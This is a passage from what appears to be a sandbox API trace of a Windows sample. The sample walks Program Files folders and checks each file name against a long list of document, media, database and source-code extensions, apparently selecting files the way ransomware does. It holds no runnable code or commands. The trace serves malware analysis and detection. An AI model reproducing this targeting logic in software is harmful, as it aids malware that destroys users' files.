(lpString=".potm") returned 5 [0034.722] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".potx") returned 5 [0034.722] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".ppa") returned 4 [0034.722] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".ppam") returned 5 [0034.722] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".ppm") returned 4 [0034.722] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".pps") returned 4 [0034.722] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0034.722] lstrlenW (lpString=".ppsm") returned 5 [0034.722] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1 [0034.722] lstrlenW (lpString=".ppt") returned 4 [0034.723] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".pptm") returned 5 [0034.723] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1 [0034.723] lstrlenW (lpString=".pptx") returned 5 [0034.723] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1 [0034.723] lstrlenW (lpString=".prn") returned 4 [0034.723] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".ps") returned 3 [0034.723] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0034.723] lstrlenW (lpString=".psb") returned 4 [0034.723] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".psd") returned 4 [0034.723] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".pst") returned 4 [0034.723] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".ptx") returned 4 [0034.723] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".pub") returned 4 [0034.723] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".pwm") returned 4 [0034.723] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".pxr") returned 4 [0034.723] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".py") returned 3 [0034.723] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0034.723] lstrlenW (lpString=".qt") returned 3 [0034.723] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0034.723] lstrlenW (lpString=".r3d") returned 4 [0034.723] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".raf") returned 4 [0034.723] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".rar") returned 4 [0034.723] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0034.723] lstrlenW (lpString=".raw") returned 4 [0034.723] lstrcmpiW (lpString1=".raw", lpString2=".mui") returned 1 [0034.724] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.725] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.726] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0034.726] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.727] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.734] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.734] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.734] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.734] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.734] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0034.734] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.734] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0034.962] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.972] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0036.222] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.552] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0036.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 64 [0036.553] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 1 [0036.554] lstrlenW (lpString="AFTRNOON") returned 8 [0036.563] lstrcmpiW (lpString1="C:\\Windows", lpString2="AFTRNOON") returned 1 [0036.564] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0036.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 64 [0036.569] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0036.577] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.577] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad6ec00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdad6ec00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xe58e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON.ELM", cAlternateFileName="")) returned 1 [0036.581] lstrlenW (lpString="AFTRNOON.ELM") returned 12 [0036.583] lstrlenW (lpString=".1cd") returned 4 [0036.585] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0036.585] lstrlenW (lpString=".3ds") returned 4 [0036.587] lstrcmpiW (lpString1=".3ds", lpString2=".ELM") returned -1 [0036.587] lstrlenW (lpString=".3fr") returned 4 [0036.587] lstrcmpiW (lpString1=".3fr", lpString2=".ELM") returned -1 [0036.587] lstrlenW (lpString=".3g2") returned 4 [0036.589] lstrcmpiW (lpString1=".3g2", lpString2=".ELM") returned -1 [0036.596] lstrlenW (lpString=".3gp") returned 4 [0036.596] lstrcmpiW (lpString1=".3gp", lpString2=".ELM") returned -1 [0036.596] lstrlenW (lpString=".7z") returned 3 [0036.596] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0036.596] lstrlenW (lpString=".accda") returned 6 [0036.596] lstrcmpiW (lpString1=".accda", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".accdb") returned 6 [0036.596] lstrcmpiW (lpString1=".accdb", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".accdc") returned 6 [0036.596] lstrcmpiW (lpString1=".accdc", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".accde") returned 6 [0036.596] lstrcmpiW (lpString1=".accde", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".accdt") returned 6 [0036.596] lstrcmpiW (lpString1=".accdt", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".accdw") returned 6 [0036.596] lstrcmpiW (lpString1=".accdw", lpString2="ON.ELM") returned -1 [0036.596] lstrlenW (lpString=".adb") returned 4 [0036.596] lstrcmpiW (lpString1=".adb", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".adp") returned 4 [0036.597] lstrcmpiW (lpString1=".adp", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai") returned 3 [0036.597] lstrcmpiW (lpString1=".ai", lpString2="ELM") returned -1 [0036.597] lstrlenW (lpString=".ai3") returned 4 [0036.597] lstrcmpiW (lpString1=".ai3", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai4") returned 4 [0036.597] lstrcmpiW (lpString1=".ai4", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai5") returned 4 [0036.597] lstrcmpiW (lpString1=".ai5", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai6") returned 4 [0036.597] lstrcmpiW (lpString1=".ai6", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai7") returned 4 [0036.597] lstrcmpiW (lpString1=".ai7", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ai8") returned 4 [0036.597] lstrcmpiW (lpString1=".ai8", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".anim") returned 5 [0036.597] lstrcmpiW (lpString1=".anim", lpString2="N.ELM") returned -1 [0036.597] lstrlenW (lpString=".arw") returned 4 [0036.597] lstrcmpiW (lpString1=".arw", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".as") returned 3 [0036.597] lstrcmpiW (lpString1=".as", lpString2="ELM") returned -1 [0036.597] lstrlenW (lpString=".asa") returned 4 [0036.597] lstrcmpiW (lpString1=".asa", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".asc") returned 4 [0036.597] lstrcmpiW (lpString1=".asc", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".ascx") returned 5 [0036.597] lstrcmpiW (lpString1=".ascx", lpString2="N.ELM") returned -1 [0036.597] lstrlenW (lpString=".asm") returned 4 [0036.597] lstrcmpiW (lpString1=".asm", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".asmx") returned 5 [0036.597] lstrcmpiW (lpString1=".asmx", lpString2="N.ELM") returned -1 [0036.597] lstrlenW (lpString=".asp") returned 4 [0036.597] lstrcmpiW (lpString1=".asp", lpString2=".ELM") returned -1 [0036.597] lstrlenW (lpString=".aspx") returned 5 [0036.598] lstrcmpiW (lpString1=".aspx", lpString2="N.ELM") returned -1 [0036.598] lstrlenW (lpString=".asr") returned 4 [0036.598] lstrcmpiW (lpString1=".asr", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".asx") returned 4 [0036.598] lstrcmpiW (lpString1=".asx", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".avi") returned 4 [0036.598] lstrcmpiW (lpString1=".avi", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".avs") returned 4 [0036.598] lstrcmpiW (lpString1=".avs", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".backup") returned 7 [0036.598] lstrcmpiW (lpString1=".backup", lpString2="OON.ELM") returned -1 [0036.598] lstrlenW (lpString=".bak") returned 4 [0036.598] lstrcmpiW (lpString1=".bak", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".bay") returned 4 [0036.598] lstrcmpiW (lpString1=".bay", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".bd") returned 3 [0036.598] lstrcmpiW (lpString1=".bd", lpString2="ELM") returned -1 [0036.598] lstrlenW (lpString=".bin") returned 4 [0036.598] lstrcmpiW (lpString1=".bin", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".bmp") returned 4 [0036.598] lstrcmpiW (lpString1=".bmp", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".bz2") returned 4 [0036.598] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".c") returned 2 [0036.598] lstrcmpiW (lpString1=".c", lpString2="LM") returned -1 [0036.598] lstrlenW (lpString=".cdr") returned 4 [0036.598] lstrcmpiW (lpString1=".cdr", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".cer") returned 4 [0036.598] lstrcmpiW (lpString1=".cer", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".cf") returned 3 [0036.598] lstrcmpiW (lpString1=".cf", lpString2="ELM") returned -1 [0036.598] lstrlenW (lpString=".cfc") returned 4 [0036.598] lstrcmpiW (lpString1=".cfc", lpString2=".ELM") returned -1 [0036.598] lstrlenW (lpString=".cfm") returned 4 [0036.598] lstrcmpiW (lpString1=".cfm", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".cfml") returned 5 [0036.599] lstrcmpiW (lpString1=".cfml", lpString2="N.ELM") returned -1 [0036.599] lstrlenW (lpString=".cfu") returned 4 [0036.599] lstrcmpiW (lpString1=".cfu", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".chm") returned 4 [0036.599] lstrcmpiW (lpString1=".chm", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".cin") returned 4 [0036.599] lstrcmpiW (lpString1=".cin", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".class") returned 6 [0036.599] lstrcmpiW (lpString1=".class", lpString2="ON.ELM") returned -1 [0036.599] lstrlenW (lpString=".clx") returned 4 [0036.599] lstrcmpiW (lpString1=".clx", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".config") returned 7 [0036.599] lstrcmpiW (lpString1=".config", lpString2="OON.ELM") returned -1 [0036.599] lstrlenW (lpString=".cpp") returned 4 [0036.599] lstrcmpiW (lpString1=".cpp", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".cr2") returned 4 [0036.599] lstrcmpiW (lpString1=".cr2", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".crt") returned 4 [0036.599] lstrcmpiW (lpString1=".crt", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".crw") returned 4 [0036.599] lstrcmpiW (lpString1=".crw", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".cs") returned 3 [0036.599] lstrcmpiW (lpString1=".cs", lpString2="ELM") returned -1 [0036.599] lstrlenW (lpString=".css") returned 4 [0036.599] lstrcmpiW (lpString1=".css", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".csv") returned 4 [0036.599] lstrcmpiW (lpString1=".csv", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".cub") returned 4 [0036.599] lstrcmpiW (lpString1=".cub", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".dae") returned 4 [0036.599] lstrcmpiW (lpString1=".dae", lpString2=".ELM") returned -1 [0036.599] lstrlenW (lpString=".dat") returned 4 [0036.599] lstrcmpiW (lpString1=".dat", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".db") returned 3 [0036.600] lstrcmpiW (lpString1=".db", lpString2="ELM") returned -1 [0036.600] lstrlenW (lpString=".dbf") returned 4 [0036.600] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dbx") returned 4 [0036.600] lstrcmpiW (lpString1=".dbx", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dc3") returned 4 [0036.600] lstrcmpiW (lpString1=".dc3", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dcm") returned 4 [0036.600] lstrcmpiW (lpString1=".dcm", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dcr") returned 4 [0036.600] lstrcmpiW (lpString1=".dcr", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".der") returned 4 [0036.600] lstrcmpiW (lpString1=".der", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dib") returned 4 [0036.600] lstrcmpiW (lpString1=".dib", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dic") returned 4 [0036.600] lstrcmpiW (lpString1=".dic", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dif") returned 4 [0036.600] lstrcmpiW (lpString1=".dif", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".divx") returned 5 [0036.600] lstrcmpiW (lpString1=".divx", lpString2="N.ELM") returned -1 [0036.600] lstrlenW (lpString=".djvu") returned 5 [0036.600] lstrcmpiW (lpString1=".djvu", lpString2="N.ELM") returned -1 [0036.600] lstrlenW (lpString=".dng") returned 4 [0036.600] lstrcmpiW (lpString1=".dng", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".doc") returned 4 [0036.600] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".docm") returned 5 [0036.600] lstrcmpiW (lpString1=".docm", lpString2="N.ELM") returned -1 [0036.600] lstrlenW (lpString=".docx") returned 5 [0036.600] lstrcmpiW (lpString1=".docx", lpString2="N.ELM") returned -1 [0036.600] lstrlenW (lpString=".dot") returned 4 [0036.600] lstrcmpiW (lpString1=".dot", lpString2=".ELM") returned -1 [0036.600] lstrlenW (lpString=".dotm") returned 5 [0036.600] lstrcmpiW (lpString1=".dotm", lpString2="N.ELM") returned -1 [0036.601] lstrlenW (lpString=".dotx") returned 5 [0036.601] lstrcmpiW (lpString1=".dotx", lpString2="N.ELM") returned -1 [0036.601] lstrlenW (lpString=".dpx") returned 4 [0036.601] lstrcmpiW (lpString1=".dpx", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dqy") returned 4 [0036.601] lstrcmpiW (lpString1=".dqy", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dsn") returned 4 [0036.601] lstrcmpiW (lpString1=".dsn", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dt") returned 3 [0036.601] lstrcmpiW (lpString1=".dt", lpString2="ELM") returned -1 [0036.601] lstrlenW (lpString=".dtd") returned 4 [0036.601] lstrcmpiW (lpString1=".dtd", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dwg") returned 4 [0036.601] lstrcmpiW (lpString1=".dwg", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dwt") returned 4 [0036.601] lstrcmpiW (lpString1=".dwt", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".dx") returned 3 [0036.601] lstrcmpiW (lpString1=".dx", lpString2="ELM") returned -1 [0036.601] lstrlenW (lpString=".dxf") returned 4 [0036.601] lstrcmpiW (lpString1=".dxf", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".edml") returned 5 [0036.601] lstrcmpiW (lpString1=".edml", lpString2="N.ELM") returned -1 [0036.601] lstrlenW (lpString=".efd") returned 4 [0036.601] lstrcmpiW (lpString1=".efd", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".elf") returned 4 [0036.601] lstrcmpiW (lpString1=".elf", lpString2=".ELM") returned -1 [0036.601] lstrlenW (lpString=".emf") returned 4 [0036.601] lstrcmpiW (lpString1=".emf", lpString2=".ELM") returned 1 [0036.601] lstrlenW (lpString=".emz") returned 4 [0036.601] lstrcmpiW (lpString1=".emz", lpString2=".ELM") returned 1 [0036.601] lstrlenW (lpString=".epf") returned 4 [0036.601] lstrcmpiW (lpString1=".epf", lpString2=".ELM") returned 1 [0036.601] lstrlenW (lpString=".eps") returned 4 [0036.601] lstrcmpiW (lpString1=".eps", lpString2=".ELM") returned 1 [0036.601] lstrlenW (lpString=".epsf") returned 5 [0036.602] lstrcmpiW (lpString1=".epsf", lpString2="N.ELM") returned -1 [0036.602] lstrlenW (lpString=".epsp") returned 5 [0036.602] lstrcmpiW (lpString1=".epsp", lpString2="N.ELM") returned -1 [0036.602] lstrlenW (lpString=".erf") returned 4 [0036.602] lstrcmpiW (lpString1=".erf", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".exr") returned 4 [0036.602] lstrcmpiW (lpString1=".exr", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".f4v") returned 4 [0036.602] lstrcmpiW (lpString1=".f4v", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".fido") returned 5 [0036.602] lstrcmpiW (lpString1=".fido", lpString2="N.ELM") returned -1 [0036.602] lstrlenW (lpString=".flm") returned 4 [0036.602] lstrcmpiW (lpString1=".flm", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".flv") returned 4 [0036.602] lstrcmpiW (lpString1=".flv", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".frm") returned 4 [0036.602] lstrcmpiW (lpString1=".frm", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".fxg") returned 4 [0036.602] lstrcmpiW (lpString1=".fxg", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".geo") returned 4 [0036.602] lstrcmpiW (lpString1=".geo", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".gif") returned 4 [0036.602] lstrcmpiW (lpString1=".gif", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".grs") returned 4 [0036.602] lstrcmpiW (lpString1=".grs", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".gz") returned 3 [0036.602] lstrcmpiW (lpString1=".gz", lpString2="ELM") returned -1 [0036.602] lstrlenW (lpString=".h") returned 2 [0036.602] lstrcmpiW (lpString1=".h", lpString2="LM") returned -1 [0036.602] lstrlenW (lpString=".hdr") returned 4 [0036.602] lstrcmpiW (lpString1=".hdr", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".hpp") returned 4 [0036.602] lstrcmpiW (lpString1=".hpp", lpString2=".ELM") returned 1 [0036.602] lstrlenW (lpString=".hta") returned 4 [0036.602] lstrcmpiW (lpString1=".hta", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".htc") returned 4 [0036.603] lstrcmpiW (lpString1=".htc", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".htm") returned 4 [0036.603] lstrcmpiW (lpString1=".htm", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".html") returned 5 [0036.603] lstrcmpiW (lpString1=".html", lpString2="N.ELM") returned -1 [0036.603] lstrlenW (lpString=".icb") returned 4 [0036.603] lstrcmpiW (lpString1=".icb", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".ics") returned 4 [0036.603] lstrcmpiW (lpString1=".ics", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".iff") returned 4 [0036.603] lstrcmpiW (lpString1=".iff", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".inc") returned 4 [0036.603] lstrcmpiW (lpString1=".inc", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".indd") returned 5 [0036.603] lstrcmpiW (lpString1=".indd", lpString2="N.ELM") returned -1 [0036.603] lstrlenW (lpString=".ini") returned 4 [0036.603] lstrcmpiW (lpString1=".ini", lpString2=".ELM") returned 1 [0036.603] lstrlenW (lpString=".iqy") returned 4 [0036.603] lstrcmpiW (lpString1=".iqy", lpString2=".ELM") returned 1 [0036.603] lstrlenW 